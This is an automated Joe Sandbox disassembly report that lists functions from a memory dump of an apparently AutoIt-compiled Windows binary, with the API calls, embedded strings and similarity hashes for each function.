                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: e767b3076d665235c4a2cccfce50736b9887f840d1e6a44dea7e474fe63f716c
                                                        • Instruction ID: f2a80773959da5591222fd4e592ac2154d83501177c381b168db7047d9815a91
                                                        • Opcode Fuzzy Hash: e767b3076d665235c4a2cccfce50736b9887f840d1e6a44dea7e474fe63f716c
                                                        • Instruction Fuzzy Hash: 6E4193345047C9ADFF31976188043E5EEF06B12349F08985ADEC67A5C3EBA599CC87A2
                                                        Function 00E7055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00E705BC
                                                        • inet_addr.WSOCK32(?), ref: 00E7061C
                                                        • gethostbyname.WSOCK32(?), ref: 00E70628
                                                        • IcmpCreateFile.IPHLPAPI ref: 00E70636
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E706C6
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E706E5
                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00E707B9
                                                        • WSACleanup.WSOCK32 ref: 00E707BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: df325bf87bea38bdedddb6048a57b2ab1cebea4d3dc7afee3cf9b836a73113ff
                                                        • Instruction ID: da0fdac88882af636962b9e543df67bb165e8ad940b265254fa6296d692b0271
                                                        • Opcode Fuzzy Hash: df325bf87bea38bdedddb6048a57b2ab1cebea4d3dc7afee3cf9b836a73113ff
                                                        • Instruction Fuzzy Hash: 0B916A35604201DFD324DF15C888F1ABBE0AF88318F15D5AAF569ABAA2C730ED45CF91
                                                        Function 00E78CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 707087890-567219261
                                                        • Opcode ID: 120e555d736e4d9f1499ee183ea1de4f129a1dc4b0097e837ab85a3949605f81
                                                        • Instruction ID: 315020763dfb76b4603f4219efeba4e70f6b845b2f11508714d9b90e8836b96c
                                                        • Opcode Fuzzy Hash: 120e555d736e4d9f1499ee183ea1de4f129a1dc4b0097e837ab85a3949605f81
                                                        • Instruction Fuzzy Hash: 1851B231A401169BCB24DF68CE559BEB7A5FF74324B219229E52AF72C4DB30DD40C7A0
                                                        Function 00E7372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32 ref: 00E73774
                                                        • CoUninitialize.OLE32 ref: 00E7377F
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00E8FB78,?), ref: 00E737D9
                                                        • IIDFromString.OLE32(?,?), ref: 00E7384C
                                                        • VariantInit.OLEAUT32(?), ref: 00E738E4
                                                        • VariantClear.OLEAUT32(?), ref: 00E73936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 636576611-1287834457
                                                        • Opcode ID: 3695bb528021627c25d5e913d00a50cb3d3a1a689fc25e15255a18d56bf44f27
                                                        • Instruction ID: 75a5d22653d308480eb5079a70db893b444a074e5b32cca0108273d3d007a35d
                                                        • Opcode Fuzzy Hash: 3695bb528021627c25d5e913d00a50cb3d3a1a689fc25e15255a18d56bf44f27
                                                        • Instruction Fuzzy Hash: D461B470608301AFD314DF64C849FABB7E4EF49715F10980AF989A7291C770EE48DBA2
                                                        Function 00E68195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00E68257
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E68267
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E68273
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E68310
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E68324
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E68356
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E6838C
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E68395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                        • String ID: *.*
                                                        • API String ID: 1464919966-438819550
                                                        • Opcode ID: 15f1e398c9ea925d20abcbffa360de48bed464b4e257825e7e2034a24bcc84c8
                                                        • Instruction ID: cd0cfc9d72b44d45414c2936843c178ef94bdcaf74305e2d8383c18f9b6fe9fc
                                                        • Opcode Fuzzy Hash: 15f1e398c9ea925d20abcbffa360de48bed464b4e257825e7e2034a24bcc84c8
                                                        • Instruction Fuzzy Hash: 1C618E715443059FC710EF60D9449AEB3E8FF89354F04891EF989E7251DB31E949CBA2
                                                        Function 00E88B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                          • Part of subcall function 00E0912D: GetCursorPos.USER32(?), ref: 00E09141
                                                          • Part of subcall function 00E0912D: ScreenToClient.USER32(00000000,?), ref: 00E0915E
                                                          • Part of subcall function 00E0912D: GetAsyncKeyState.USER32(00000001), ref: 00E09183
                                                          • Part of subcall function 00E0912D: GetAsyncKeyState.USER32(00000002), ref: 00E0919D
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00E88B6B
                                                        • ImageList_EndDrag.COMCTL32 ref: 00E88B71
                                                        • ReleaseCapture.USER32 ref: 00E88B77
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00E88C12
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E88C25
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00E88CFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
                                                        • API String ID: 1924731296-655930031
                                                        • Opcode ID: 69e5728bdb3d2258b73a073f68c518608b4310be6ba72eedc26321708fbca7b5
                                                        • Instruction ID: de80cc9f90d3e848d837dcabf9bcc91f5f20e3ab49c88b872fb960a33b7179b8
                                                        • Opcode Fuzzy Hash: 69e5728bdb3d2258b73a073f68c518608b4310be6ba72eedc26321708fbca7b5
                                                        • Instruction Fuzzy Hash: FA51EE70204304AFD700EF15CD56FAAB7E4FB89714F40062DF98A672E2CB719908CB62
                                                        Function 00E63388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E633CF
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E633F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-3080491070
                                                        • Opcode ID: 2a5cb799f7c5cef235e3852323e8da1c4d3f81bb3ce539f1a0b59b839f0ce1b5
                                                        • Instruction ID: cd4eb78ac0282b8b0e5c4c51e9b9353c26f616d0c2ffd5da4ca4633a7070e4aa
                                                        • Opcode Fuzzy Hash: 2a5cb799f7c5cef235e3852323e8da1c4d3f81bb3ce539f1a0b59b839f0ce1b5
                                                        • Instruction Fuzzy Hash: 05518D71900209AADF15EBA4DD42EFEB7B8EF14384F219065F50972092EB356F58CB70
                                                        Function 00E5B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 1256254125-769500911
                                                        • Opcode ID: 2f294f7eb14e9d950faed636a60a8a0a3bb591fe40271056d8adf4974b2a9e9d
                                                        • Instruction ID: 803fea6483038f2da15b7ff3e76ff3b144918b2a0990ac552c7d0c2efe8e4849
                                                        • Opcode Fuzzy Hash: 2f294f7eb14e9d950faed636a60a8a0a3bb591fe40271056d8adf4974b2a9e9d
                                                        • Instruction Fuzzy Hash: D2411932A000279BCB105F7DC8915BF77A5BFA0759B246A2AEC21FB284E775CD85C790
                                                        Function 00E65393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E653A0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E65416
                                                        • GetLastError.KERNEL32 ref: 00E65420
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00E654A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: ec1202a9d92b4e2a1ee9f9f678d712708666f617fb877950d3a535b8f175415f
                                                        • Instruction ID: 2bde6eeddefb46b018c958ddf3969c54924300abce952b6472f1fea67950fa6f
                                                        • Opcode Fuzzy Hash: ec1202a9d92b4e2a1ee9f9f678d712708666f617fb877950d3a535b8f175415f
                                                        • Instruction Fuzzy Hash: DD31E336B405049FC710DF68D485BEEBBB4EF45349F1490A6E516EB292DB30DD86CBA0
                                                        Function 00E83C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMenu.USER32 ref: 00E83C79
                                                        • SetMenu.USER32(?,00000000), ref: 00E83C88
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E83D10
                                                        • IsMenu.USER32(?), ref: 00E83D24
                                                        • CreatePopupMenu.USER32 ref: 00E83D2E
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E83D5B
                                                        • DrawMenuBar.USER32 ref: 00E83D63
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                        • String ID: 0$F
                                                        • API String ID: 161812096-3044882817
                                                        • Opcode ID: b6b47f9837607e1763f7ebe599c8567c47541af6943d4aa9ec8d80800ef0f9d4
                                                        • Instruction ID: c92e8a92a012aee7958876dd0a10c81a0ae24a4b03c9f13b9483a09b8968ae8a
                                                        • Opcode Fuzzy Hash: b6b47f9837607e1763f7ebe599c8567c47541af6943d4aa9ec8d80800ef0f9d4
                                                        • Instruction Fuzzy Hash: F6418B75A01209AFDF14DF65D844EEABBB5FF4A304F144029F90AA73A0D731AA14CFA0
                                                        Function 00E83A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E83A9D
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E83AA0
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E83AC7
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E83AEA
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E83B62
                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E83BAC
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E83BC7
                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E83BE2
                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E83BF6
                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E83C13
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: 6653be6aeb9ca8ce6fc05564e7a91f570f38f61774bde4530ab3dd1e22998045
                                                        • Instruction ID: 23db2106dbe90c61ec2dd5f21bbe666d654325020e12232e3202d493bba6ae17
                                                        • Opcode Fuzzy Hash: 6653be6aeb9ca8ce6fc05564e7a91f570f38f61774bde4530ab3dd1e22998045
                                                        • Instruction Fuzzy Hash: 7D617C75900248AFDB10DF68CC81EEE77F8EB49704F1000A9FA19B7292D774AE45DB60
                                                        Function 00E5B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E5B151
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B165
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00E5B16C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B17B
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5B18D
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B1A6
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B1B8
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B1FD
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B212
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E5A1E1,?,00000001), ref: 00E5B21D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 6174de667b565c7cae2900d1fd6965340ef4cb7dd4ed48f6402b3394b1d0c590
                                                        • Instruction ID: 1c367705e3c2cbe3259d83bddf537cb2f72cab263afd035de1f1e3ed8dbd24f3
                                                        • Opcode Fuzzy Hash: 6174de667b565c7cae2900d1fd6965340ef4cb7dd4ed48f6402b3394b1d0c590
                                                        • Instruction Fuzzy Hash: 6C31EE76100604BFDB109F26EC49FAD7BAAFB11316F209824FE15F61A0D7B09A498F30
                                                        Function 00E22C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00E22C94
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E22CA0
                                                        • _free.LIBCMT ref: 00E22CAB
                                                        • _free.LIBCMT ref: 00E22CB6
                                                        • _free.LIBCMT ref: 00E22CC1
                                                        • _free.LIBCMT ref: 00E22CCC
                                                        • _free.LIBCMT ref: 00E22CD7
                                                        • _free.LIBCMT ref: 00E22CE2
                                                        • _free.LIBCMT ref: 00E22CED
                                                        • _free.LIBCMT ref: 00E22CFB
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: a2d620a9fa87b463f5477e65b4f943f032c7e5de2afe3fc4fd4ec27e23b5d693
                                                        • Instruction ID: 2d9ff2ae83cfb77ac34a3b56991b93b3629012ec6ca5bfcb66bb5c68d962b917
                                                        • Opcode Fuzzy Hash: a2d620a9fa87b463f5477e65b4f943f032c7e5de2afe3fc4fd4ec27e23b5d693
                                                        • Instruction Fuzzy Hash: B3119B76500118BFCB02EF54E942CDD3BA5FF49350F9155A9FA486F232DA31EE909B90
                                                        Function 00DF1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DF1459
                                                        • OleUninitialize.OLE32(?,00000000), ref: 00DF14F8
                                                        • UnregisterHotKey.USER32(?), ref: 00DF16DD
                                                        • DestroyWindow.USER32(?), ref: 00E324B9
                                                        • FreeLibrary.KERNEL32(?), ref: 00E3251E
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E3254B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 0846616aedc40ac12e9ab4180ac4bd83d7aa3fd3aa4358dfb6737c439bf9d32d
                                                        • Instruction ID: f2e5c6b8ef4f6b27fe4ad8d1a851dae4a5406167d2ce3f58c49b8774749d5eb7
